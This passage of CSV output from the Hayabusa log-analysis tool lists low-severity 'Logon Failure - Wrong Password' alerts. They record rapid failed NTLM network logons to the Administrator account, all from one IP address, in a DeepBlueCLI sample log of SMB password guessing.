NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: 